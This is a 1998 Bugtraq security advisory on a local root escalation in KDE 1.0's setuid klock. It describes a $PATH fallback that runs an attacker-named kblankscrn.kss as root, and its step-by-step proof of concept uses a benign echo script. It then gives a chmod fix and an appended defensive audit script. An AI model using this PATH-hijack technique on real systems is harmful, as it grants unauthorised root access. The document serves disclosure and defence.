KDE 1.0's klock can be used to gain root privileges
daemon@ATHENA.MIT.EDU (HD Moore)
Mon Nov 16 22:20:37 1998
Date: Mon, 16 Nov 1998 19:57:51 -0600
Reply-To: HD Moore <hdmoore@USA.NET>
From: HD Moore <hdmoore@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
--( the problem )--
The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss from the same directory as itself. If kblankscrn.kss cannot
be executed there (missing, or without the execute bit) then klock falls
back to searching the current user's $PATH for any executable with the
same name and executes it as root. If no executable is found in the
current path, it gives this message:
>Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin
Default modes for klock and kblankscrn.kss are:
-rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock
-rwsr-xr-x 1 root root 43600 Mar 12 1998 /opt/kde/bin/kblankscrn.kss
Systems Affected: any system that runs KDE 1.0
____________________________________________________
--( the exploit )--
This is only exploitable if any of the following occurs:
1) klock is moved to another directory
2) kblankscrn.kss is moved to another directory
3) kblankscrn.kss is not executable
To see if you are vulnerable...
1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script that looks like:
#!/bin/sh
echo Running script as `whoami`!
exit
4) name this script kblankscrn.kss and move it to your home directory
(which must be in your $PATH for the fallback search to find it).
5) execute /opt/kde/bin/klock; you should see:
user@hostname:/home/user> /opt/kde/bin/klock
user@hostname:/home/user> Running script as root!
6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
____________________________________________________
--( the fix )--
chmod 700 /opt/kde/bin/klock (removing the setuid bit), or wait until KDE is updated.
The KDE bug list has been notified.
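An audit of the three conditions listed above, added here as an example and not part of the original post: it reports whether a klock/kblankscrn.kss pair is in the exploitable state (klock setuid while the screensaver is missing or not executable alongside it). The directory is a parameter so the same check can be run against /opt/kde/bin or a test tree; klock_status is a name chosen for this example.

```shell
#!/bin/sh
# Added audit check for the klock fallback described in the advisory.
# Usage: sh klock_check.sh /opt/kde/bin
#
# klock_status DIR  ->  0 = safe, 1 = vulnerable, 2 = no klock in DIR
klock_status() {
    dir=$1
    klock="$dir/klock"
    saver="$dir/kblankscrn.kss"

    if [ ! -f "$klock" ]; then
        echo "klock not found in $dir"
        return 2
    fi

    # Without the setuid bit, a $PATH fallback only runs as the invoking
    # user, which is exactly what the advisory's chmod 700 fix achieves.
    if [ ! -u "$klock" ]; then
        echo "OK: $klock is not setuid"
        return 0
    fi

    # Condition 1/2: screensaver not next to klock -> $PATH search as root.
    if [ ! -f "$saver" ]; then
        echo "VULNERABLE: $klock is setuid but $saver is missing"
        return 1
    fi

    # Condition 3: screensaver present but not executable -> same fallback.
    if [ ! -x "$saver" ]; then
        echo "VULNERABLE: $klock is setuid but $saver is not executable"
        return 1
    fi

    echo "OK: $klock is setuid and $saver is executable alongside it"
    return 0
}

# Only run the check when a directory was given on the command line.
if [ $# -gt 0 ]; then
    klock_status "$1"
fi
```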